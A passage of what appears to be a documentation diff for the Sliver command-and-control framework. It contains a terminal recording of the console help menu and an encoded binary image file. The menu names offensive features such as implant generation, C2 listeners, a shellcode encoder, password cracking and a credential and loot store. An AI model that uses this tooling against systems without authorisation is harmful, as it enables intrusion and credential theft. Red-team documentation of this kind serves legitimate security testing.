+[17.513675, "o", "\u001b[266D\u001b[13C\u001b[0J\u001b[266D\r\r\n"] +[17.519913, "o", "\u001b[0 q\r\n"] +[17.54967, "o", "Server commands\r\n\r\n"] +[17.564302, "o", "Usage:\r\n [command]\r\n\r\nMultiplayer\r\n kick-operator Kick an operator from the server\r\n multiplayer Enable multiplayer mode\r\n new-operator Create a new operator config file\r\n\r\nGeneric\r\n aliases List current aliases\r\n armory Automatically download and install extensions/aliases\r\n crack Crack: GPU password cracking\r\n creds Manage the database of credentials\r\n exit Exit the program\r\n help Help about any command\r\n licenses Open source licenses\r\n operators Manage operators\r\n settings Manage client settings\r\n update Check for updates\r\n version Display version information\r\n\r\nNetwork\r\n c2profiles Display C2 profile details\r\n http Start an HTTP listener\r\n https Start an HTTPS listener\r\n jobs Job control\r\n mtls Start an mTLS listener\r\n stage-listener Start a stager listener\r\n websites Host static content (used with HTTP C2)\r\n wg Start a WireGuard li"] +[17.564452, "o", "stener\r\n wg-config Generate a new WireGuard client config\r\n\r\nPayload\r\n builders List external builders\r\n generate Generate an implant binary\r\n implants List implant builds\r\n profiles List existing profiles\r\n regenerate Regenerate an implant\r\n shikata-ga-nai Polymorphic binary shellcode encoder (ノ ゜Д゜)ノ ︵ 仕方がない\r\n\r\nSliver\r\n beacons Manage beacons\r\n hosts Manage the database of hosts\r\n info Get info about session\r\n loot Manage the server's loot store\r\n monitor Monitor threat intel platforms for Sliver implants\r\n reaction Manage automatic reactions to events\r\n sessions Session management\r\n taskmany Task many beacons or sessions\r\n use Switch the active session or beacon\r\n\r\nFlags:\r\n -h, --help help for this command\r\n\r\nUse \" [command] --help\" for more information about a command.\r\n"] +[17.565542, "o", "\r\n"] +[17.574109, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[17.574849, "o", "\u001b[1 q\u001b[?25l\u001b[266D"] +[17.575311, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.578397, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[266D\u001b[1A\u001b[9D\u001b[9C\u001b[266D\u001b[9C\u001b[?25h"] +[18.828372, "o", "\u001b[?25l\u001b[266D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[18.831242, "o", "\u001b[6n"] +[18.851771, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[18.853215, "o", "\u001b[0K\u001b[0J\u001b[266D\u001b[1A\u001b[10D\u001b[9C\u001b[266D\u001b[10C\u001b[?25h"] +[18.997027, "o", "\u001b[?25l"] +[19.002369, "o", "\u001b[266D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.014846, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[19.016957, "o", "\u001b[0J\u001b[266D\u001b[1A\u001b[11D\u001b[9C\u001b[266D\u001b[11C\u001b[?25h"] +[19.128941, "o", "\u001b[?25l"] +[19.1348, "o", "\u001b[266D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.144027, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[19.144368, "o", "\u001b[266D\u001b[1A\u001b[12D\u001b[9C\u001b[266D\u001b[12C\u001b[?25h"] +[19.251624, "o", "\u001b[?25l"] +[19.252599, "o", "\u001b[266D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.25855, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[19.258968, "o", "\u001b[0K\u001b[0J\u001b[266D\u001b[1A\u001b[13D\u001b[9C\u001b[266D\u001b[13C\u001b[?25h"] +[19.380187, "o", "\u001b[13D\u001b[9C"] +[19.394384, "o", "\u001b[6n"] +[19.401432, "o", "\u001b[266D\u001b[13C\u001b[0J\u001b[266D\r\r\n\u001b[0 q\r\n"] +[19.414383, "o", "Exiting...\r\n"] +[19.462658, "o", "# "] +[19.859529, "o", "\r\n"] diff --git a/docs/sliver-docs/public/images/Architecture.png b/docs/sliver-docs/public/images/Architecture.png new file mode 100644 index 0000000000000000000000000000000000000000..45beaae3b1d00d11322dc1654a02bb6049608b9b GIT binary patch literal 102743 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 